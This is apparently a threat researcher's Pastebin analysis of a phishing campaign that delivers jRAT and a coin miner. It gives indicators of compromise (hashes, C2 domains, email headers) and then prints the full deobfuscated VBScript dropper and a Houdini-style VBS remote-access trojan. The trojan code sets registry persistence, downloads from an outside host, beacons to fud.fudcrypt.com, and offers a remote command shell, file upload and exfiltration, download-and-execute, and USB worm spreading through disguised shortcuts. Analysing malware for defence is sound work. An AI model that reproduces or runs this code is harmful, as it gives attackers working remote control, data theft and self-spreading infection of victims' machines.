Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #phishing email drops a bitcoin miner and jrat out of a .IMG file with a .VBS inside
- more info @neonprimetime
- https://neonprimetime.blogspot.com/2018/11/jrat-and-bitcoin-miner-from-img-vbs-phish.html
- ------
- VT links
- ------
- https://www.virustotal.com/#/file/f2bd54981d86e7d475164ca5725090232dc1efd5251c42b58292d8b51e506aa2/community
- https://www.virustotal.com/#/file/370784be22039af009a0b4e7915e36c4899133ac3afbb659cbbbec03dc9a2c6e/community
- https://www.virustotal.com/#/file/07e13a645058b0f0afe4e79a34abf08dbead97c50b41cb9593035af13250e0f1/community
- https://www.virustotal.com/#/file/b0cf01550e576a21ff62f1c34dbe202b14b73b0465cdf7558c445f09eee3a6c1/community
- https://www.virustotal.com/#/file/5dcd1a584e27f75870b2c95aac56523927377d8c693fe6fc8a3f422cac79cadc/community
- https://www.virustotal.com/#/file/77ecb4b190368eacf09103247fdd75c0c30a6b3c3340acb3d15df7747178cabc/community
- ----
- app anyrun
- ----
- https://app.any.run/tasks/77449da4-d60e-4c45-922c-b4a85c7ef814
- -----
- dns
- -----
- welcomehome.duckdns.org [173.46.85.98]
- fud.fudcrypt.com
- ----
- md5 hashes
- ----
- f3a99bcd752bff6a15154484c94cdc21
- f3c67b1a2631fde05b24ab26ce5bf6ea
- b93df40c82b94680218ea964b5ce6808 ( THOR APT scanner says #magickitten #jrat #MiddleEasternThreatGroups )
- 11d828c9301a36749174b1e0459cba55
- d859b188405930541aea64ad22f8cf92
- 7443f9ecbd050b1e7eae529983543b05
- ------
- email headers
- ------
- X-Env-Sender: dbittnerf@gmail.com
- x-originating-ip: [162.144.196.83]
- Received: from server.ineli-mena.org (HELO server.ineli-mena.org)
- From: "Purchase Assistance" <dbittnerf@gmail.com>
- Subject: RE: B&G EQUIPMENT PO# 102571
- Date: Mon, 5 Nov 2018
- ---------------
- vbscript
- ---------------
- Set noun = CreateObject("ADODB.Stream")
- Private Function hen(water, omo, alafia)
- If omo = 4 Then
- noun.Type = 1
- noun.Open
- noun.Write water
- noun.Position = 0
- noun.Type = 2
- noun.CharSet = "us-ascii"
- hen = noun.ReadText
- End If
- End Function
- Private Function bas_6_4_2_bin(kintu, kinpo, kili, manj, aaro, sport)
- Set ms_lmx_dfa = CreateObject("Microsoft.XMLDOM")
- Set ms_pmt_dfa = ms_lmx_dfa.createElement("tmp")
- ms_pmt_dfa.DataType = "bin.base64"
- ms_pmt_dfa.Text = kili
- bas_6_4_2_bin = ms_pmt_dfa.NodeTypedValue
- End Function
- Private Sub table(chair, milo, sound, clef, sule, naira)
- For i = 0 To 0
- ExecuteGlobal naira
- Next
- End Sub
- Private Function linen(stove, gard, radio, ladela)
- Dim m_u_t_e_x, the_const, m_a_i_n, pau_sed
- m_u_t_e_x = "#("
- the_const = "m"
- m_a_i_n = "[REMOVED]"
- pau_sed = ""
- If radio = 0 Then
- pau_sed = Replace(m_a_i_n, m_u_t_e_x, the_const)
- linen = bas_6_4_2_bin(Nothing, 1, pau_sed, 10, 87, False)
- Else
- 'table "7", False, 10, ladela, Nothing, 10
- linen = ladela
- End If
- End Function
- Dim kilimanjaro
- kilimanjaro = linen(0, Nothing, 1, hen(linen(0, Nothing, 0, 284), 4, Nothing))
- table "2", Nothing, False, True, 0, kilimanjaro
- Set noun = Nothing
- ---------------
- decoded binary
- ---------------
- Const TypeBinary = 1
- Const ForReading = 1, ForWriting = 2, ForAppending = 8
- Dim longText1
- longText1 = "[REMOVED]"
- Set wshShell1 = CreateObject("WScript.Shell")
- Dim appdatadir1, stubpath1
- appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%")
- stubpath1 = appdatadir1 & "\VRMedabkRb.vbs"
- Dim decoded1
- decoded1 = decodeBase64(longText1)
- writeBytes stubpath1, decoded1
- wshShell1.Run("""" & stubpath1 & """")
- Set wshShell1 = Nothing
- Dim longText
- longText = "[REMOVED]"
- longText = Replace(longText, "#(", "A")
- Set wshShell = CreateObject( "WScript.Shell" )
- Dim tempdir, appdatadir, text, stubpath
- tempdir = wshShell.ExpandEnvironmentStrings("%temp%")
- appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%")
- stubpath = appdatadir & "\ntfsmgr.jar"
- Dim decoded
- decoded = decodeBase64(longText)
- writeBytes stubpath, decoded
- Set fso = CreateObject("Scripting.FileSystemObject")
- On Error Resume Next
- text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\CurrentVersion")
- text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\" & text & "\JavaHome")
- If text = "" Then
- text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion")
- text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\" & text & "\JavaHome")
- If text <> "" Then
- text = text & "\bin\javaw.exe"
- End If
- Else
- text = text & "\bin\javaw.exe"
- End If
- If InStr(text, "jre") > 0 Then
- Dim validJrePath
- validJrePath = getValidJre(text)
- If InStr(validJrePath, "javaw.exe") > 0 Then
- wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """" & validJrePath & """ -jar """ & stubpath & """", "REG_SZ"
- wshShell.Run("""" & validJrePath & """" & " -jar " & """" & stubpath & """")
- Else
- GrabJreFromNet()
- End If
- Else
- GrabJreFromNet()
- End If
- Private Sub GrabJreFromNet()
- Dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
- Dim bStrm: Set bStrm = createobject("Adodb.Stream")
- xHttp.Open "GET", "http://www.thegoldfingerinc.com/images/jre.zip", False
- xHttp.Send
- with bStrm
- .type = 1
- .open
- .write xHttp.responseBody
- .savetofile appdatadir & "\jre.zip", 2
- end with
- UnZip appdatadir & "\jre.zip", appdatadir & "\jre7"
- wshShell.RegWrite "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion", "1.7", "REG_SZ"
- wshShell.RegWrite "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\1.7\JavaHome", appdatadir & "\jre7", "REG_SZ"
- wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """" & appdatadir & "\jre7\bin\javaw.exe"" -jar " & """" & stubpath & """", "REG_SZ"
- wshShell.Run("""" & appdatadir & "\jre7\bin\javaw.exe"" -jar " & """" & stubpath & """")
- End Sub
- Private Function decodeBase64(base64)
- Dim DM, EL
- Set DM = CreateObject("Microsoft.XMLDOM")
- Set EL = DM.createElement("tmp")
- EL.DataType = "bin.base64"
- EL.Text = base64
- decodeBase64 = EL.NodeTypedValue
- End Function
- Private Sub writeBytes(file, bytes)
- Dim binaryStream
- Set binaryStream = CreateObject("ADODB.Stream")
- binaryStream.Type = TypeBinary
- binaryStream.Open
- binaryStream.Write bytes
- binaryStream.SaveToFile file, ForWriting
- End Sub
- Sub UnZip(zipfile, ExtractTo)
- if fso.GetExtensionName(zipfile) = "zip" then
- If NOT fso.FolderExists(ExtractTo) Then
- fso.CreateFolder(ExtractTo)
- End If
- set objShell = CreateObject("Shell.Application")
- set destination = objShell.NameSpace(ExtractTo)
- set zip_content = objShell.NameSpace(zipfile).Items
- for i = 0 to zip_content.count - 1
- if (fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName(zip_content.item(i).path))) then
- fso.DeleteFile(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName(zip_content.item(i).path))
- end if
- destination.copyHere zip_content.item(i), 20
- next
- End if
- End Sub
- Function getValidJre(res)
- a = Split(res, vbCrLf)
- for each x in a
- if InStr(x, "javaw.exe") > 0 Then
- Return = wshShell.Run("cmd /c " & """" & x & """" & " -version 2> %temp%\output.txt", 0, true)
- Set file = fso.OpenTextFile(tempdir & "\output.txt", 1)
- text = file.ReadAll
- file.Close
- If InStr(text, "1.6") > 0 Or InStr(text, "1.7") > 0 Or InStr(text, "1.8") > 0 Then
- getValidJre = x
- Exit Function
- End If
- End If
- next
- End Function
- Set wshShell = Nothing
- ------
- nested vbscript
- ------
- Set noun = CreateObject("ADODB.Stream")
- Private Function hen(water, omo, alafia)
- If omo = 4 Then
- noun.Type = 1
- noun.Open
- noun.Write water
- noun.Position = 0
- noun.Type = 2
- noun.CharSet = "us-ascii"
- hen = noun.ReadText
- End If
- End Function
- Private Function bas_6_4_2_bin(kintu, kinpo, kili, manj, aaro, sport)
- Set ms_lmx_dfa = CreateObject("Microsoft.XMLDOM")
- Set ms_pmt_dfa = ms_lmx_dfa.createElement("tmp")
- ms_pmt_dfa.DataType = "bin.base64"
- ms_pmt_dfa.Text = kili
- bas_6_4_2_bin = ms_pmt_dfa.NodeTypedValue
- End Function
- Private Sub table(chair, milo, sound, clef, sule, naira)
- For i = 0 To 0
- ExecuteGlobal naira
- Next
- End Sub
- Private Function linen(stove, gard, radio, ladela)
- Dim m_u_t_e_x, the_const, m_a_i_n, pau_sed
- m_u_t_e_x = "#("
- the_const = "A"
- m_a_i_n = "[REMOVED]"
- pau_sed = ""
- If radio = 0 Then
- pau_sed = Replace(m_a_i_n, m_u_t_e_x, the_const)
- linen = bas_6_4_2_bin(Nothing, 1, pau_sed, 10, 87, False)
- Else
- 'table "7", False, 10, ladela, Nothing, 10
- linen = ladela
- End If
- End Function
- Dim kilimanjaro
- kilimanjaro = linen(0, Nothing, 1, hen(linen(0, Nothing, 0, 284), 4, Nothing))
- table "2", Nothing, False, True, 0, kilimanjaro
- Set noun = Nothing
- -----
- 3rd nested script decoded
- -----
- '<[ recoder : houdini (c) skype : houdini-fx ]>
- '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- 'host = "pm2bitcoin.com"
- 'port = 3175
- host = "fud.fudcrypt.com"
- port = 7755
- installdir = "%appdata%"
- lnkfile = true
- lnkfolder = true
- '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
- dim shellobj
- set shellobj = wscript.createobject("wscript.shell")
- dim filesystemobj
- set filesystemobj = createobject("scripting.filesystemobject")
- dim httpobj
- set httpobj = createobject("msxml2.xmlhttp")
- '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
- installname = wscript.scriptname
- startup = shellobj.specialfolders ("startup") & "\"
- installdir = shellobj.expandenvironmentstrings(installdir) & "\"
- if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
- spliter = "<" & "|" & ">"
- sleep = 5000
- dim response
- dim cmd
- dim param
- info = ""
- usbspreading = ""
- startdate = ""
- dim oneonce
- '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
- on error resume next
- instance
- while true
- install
- response = ""
- response = post ("is-ready","")
- cmd = split (response,spliter)
- select case cmd (0)
- case "excecute"
- param = cmd (1)
- execute param
- case "update"
- param = cmd (1)
- oneonce.close
- set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
- oneonce.write param
- oneonce.close
- shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
- wscript.quit
- case "uninstall"
- uninstall
- case "send"
- download cmd (1),cmd (2)
- case "site-send"
- sitedownloader cmd (1),cmd (2)
- case "recv"
- param = cmd (1)
- upload (param)
- case "enum-driver"
- post "is-enum-driver",enumdriver
- case "enum-faf"
- param = cmd (1)
- post "is-enum-faf",enumfaf (param)
- case "enum-process"
- post "is-enum-process",enumprocess
- case "cmd-shell"
- param = cmd (1)
- post "is-cmd-shell",cmdshell (param)
- case "delete"
- param = cmd (1)
- deletefaf (param)
- case "exit-process"
- param = cmd (1)
- exitprocess (param)
- case "sleep"
- param = cmd (1)
- sleep = eval (param)
- end select
- wscript.sleep sleep
- wend
- sub install
- on error resume next
- dim lnkobj
- dim filename
- dim foldername
- dim fileicon
- dim foldericon
- upstart
- for each drive in filesystemobj.drives
- if drive.isready = true then
- if drive.freespace > 0 then
- if drive.drivetype = 1 then
- filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
- if filesystemobj.fileexists (drive.path & "\" & installname) then
- filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
- end if
- for each file in filesystemobj.getfolder( drive.path & "\" ).Files
- if not lnkfile then exit for
- if instr (file.name,".") then
- if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
- file.attributes = 2+4
- if ucase (file.name) <> ucase (installname) then
- filename = split(file.name,".")
- set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
- lnkobj.windowstyle = 7
- lnkobj.targetpath = "cmd.exe"
- lnkobj.workingdirectory = ""
- lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
- if instr (fileicon,",") = 0 then
- lnkobj.iconlocation = file.path
- else
- lnkobj.iconlocation = fileicon
- end if
- lnkobj.save()
- end if
- end if
- end if
- next
- for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
- if not lnkfolder then exit for
- folder.attributes = 2+4
- foldername = folder.name
- set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
- lnkobj.windowstyle = 7
- lnkobj.targetpath = "cmd.exe"
- lnkobj.workingdirectory = ""
- lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
- if instr (foldericon,",") = 0 then
- lnkobj.iconlocation = folder.path
- else
- lnkobj.iconlocation = foldericon
- end if
- lnkobj.save()
- next
- end If
- end If
- end if
- next
- err.clear
- end sub
- sub uninstall
- on error resume next
- dim filename
- dim foldername
- shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
- shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
- filesystemobj.deletefile startup & installname ,true
- filesystemobj.deletefile wscript.scriptfullname ,true
- for each drive in filesystemobj.drives
- if drive.isready = true then
- if drive.freespace > 0 then
- if drive.drivetype = 1 then
- for each file in filesystemobj.getfolder ( drive.path & "\").files
- on error resume next
- if instr (file.name,".") then
- if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
- file.attributes = 0
- if ucase (file.name) <> ucase (installname) then
- filename = split(file.name,".")
- filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
- else
- filesystemobj.deletefile (drive.path & "\" & file.name)
- end If
- else
- filesystemobj.deletefile (file.path)
- end if
- end if
- next
- for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
- folder.attributes = 0
- next
- end if
- end if
- end if
- next
- wscript.quit
- end sub
- function post (cmd ,param)
- post = param
- httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
- httpobj.setrequestheader "user-agent:",information
- httpobj.send param
- post = httpobj.responsetext
- end function
- function information
- on error resume next
- if inf = "" then
- inf = hwid & spliter
- inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
- inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
- set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set os = root.execquery ("select * from win32_operatingsystem")
- for each osinfo in os
- inf = inf & osinfo.caption & spliter
- exit for
- next
- inf = inf & "plus" & spliter
- inf = inf & security & spliter
- inf = inf & usbspreading
- information = inf
- else
- information = inf
- end if
- end function
- sub upstart ()
- on error resume Next
- shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
- filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
- filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
- end sub
- function hwid
- on error resume next
- set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set disks = root.execquery ("select * from win32_logicaldisk")
- for each disk in disks
- if disk.volumeserialnumber <> "" then
- hwid = disk.volumeserialnumber
- exit for
- end if
- next
- end function
- function security
- on error resume next
- security = ""
- set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
- for each objitem in colitems
- versionstr = split (objitem.version,".")
- next
- versionstr = split (colitems.version,".")
- osversion = versionstr (0) & "."
- for x = 1 to ubound (versionstr)
- osversion = osversion & versionstr (i)
- next
- osversion = eval (osversion)
- if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
- set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
- Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
- for each objantivirus in colantivirus
- security = security & objantivirus.displayname & " ."
- next
- if security = "" then security = "nan-av"
- end function
- function instance
- on error resume next
- usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
- if usbspreading = "" then
- if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
- usbspreading = "true - " & date
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
- else
- usbspreading = "false - " & date
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
- end if
- end If
- upstart
- set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
- set installfullnameshort = filesystemobj.getfile (installdir & installname)
- if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
- shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
- wscript.quit
- end If
- err.clear
- set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
- if err.number > 0 then wscript.quit
- end function
- sub sitedownloader (fileurl,filename)
- strlink = fileurl
- strsaveto = installdir & filename
- set objhttpdownload = createobject("msxml2.xmlhttp" )
- objhttpdownload.open "get", strlink, false
- objhttpdownload.send
- set objfsodownload = createobject ("scripting.filesystemobject")
- if objfsodownload.fileexists (strsaveto) then
- objfsodownload.deletefile (strsaveto)
- end if
- if objhttpdownload.status = 200 then
- dim objstreamdownload
- set objstreamdownload = createobject("adodb.stream")
- with objstreamdownload
- .type = 1
- .open
- .write objhttpdownload.responsebody
- .savetofile strsaveto
- .close
- end with
- set objstreamdownload = nothing
- end if
- if objfsodownload.fileexists(strsaveto) then
- shellobj.run objfsodownload.getfile (strsaveto).shortpath
- end if
- end sub
- sub download (fileurl,filedir)
- if filedir = "" then
- filedir = installdir
- end if
- strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
- set objhttpdownload = createobject("msxml2.xmlhttp")
- objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
- objhttpdownload.send ""
- set objfsodownload = createobject ("scripting.filesystemobject")
- if objfsodownload.fileexists (strsaveto) then
- objfsodownload.deletefile (strsaveto)
- end if
- if objhttpdownload.status = 200 then
- dim objstreamdownload
- set objstreamdownload = createobject("adodb.stream")
- with objstreamdownload
- .type = 1
- .open
- .write objhttpdownload.responsebody
- .savetofile strsaveto
- .close
- end with
- set objstreamdownload = nothing
- end if
- if objfsodownload.fileexists(strsaveto) then
- shellobj.run objfsodownload.getfile (strsaveto).shortpath
- end if
- end sub
- function upload (fileurl)
- dim httpobj,objstreamuploade,buffer
- set objstreamuploade = createobject("adodb.stream")
- with objstreamuploade
- .type = 1
- .open
- .loadfromfile fileurl
- buffer = .read
- .close
- end with
- set objstreamdownload = nothing
- set httpobj = createobject("msxml2.xmlhttp")
- httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
- httpobj.send buffer
- end function
- function enumdriver ()
- for each drive in filesystemobj.drives
- if drive.isready = true then
- enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
- end if
- next
- end Function
- function enumfaf (enumdir)
- enumfaf = enumdir & spliter
- for each folder in filesystemobj.getfolder (enumdir).subfolders
- enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
- next
- for each file in filesystemobj.getfolder (enumdir).files
- enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter
- next
- end function
- function enumprocess ()
- on error resume next
- set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
- set colitems = objwmiservice.execquery("select * from win32_process",,48)
- dim objitem
- for each objitem in colitems
- enumprocess = enumprocess & objitem.name & "|"
- enumprocess = enumprocess & objitem.processid & "|"
- enumprocess = enumprocess & objitem.executablepath & spliter
- next
- end function
- sub exitprocess (pid)
- on error resume next
- shellobj.run "taskkill /F /T /PID " & pid,7,true
- end sub
- sub deletefaf (url)
- on error resume next
- filesystemobj.deletefile url
- filesystemobj.deletefolder url
- end sub
- function cmdshell (cmd)
- dim httpobj,oexec,readallfromany
- set oexec = shellobj.exec ("%comspec% /c " & cmd)
- if not oexec.stdout.atendofstream then
- readallfromany = oexec.stdout.readall
- elseif not oexec.stderr.atendofstream then
- readallfromany = oexec.stderr.readall
- else
- readallfromany = ""
- end if
- cmdshell = readallfromany
- end function
Add Comment
Please, Sign In to add comment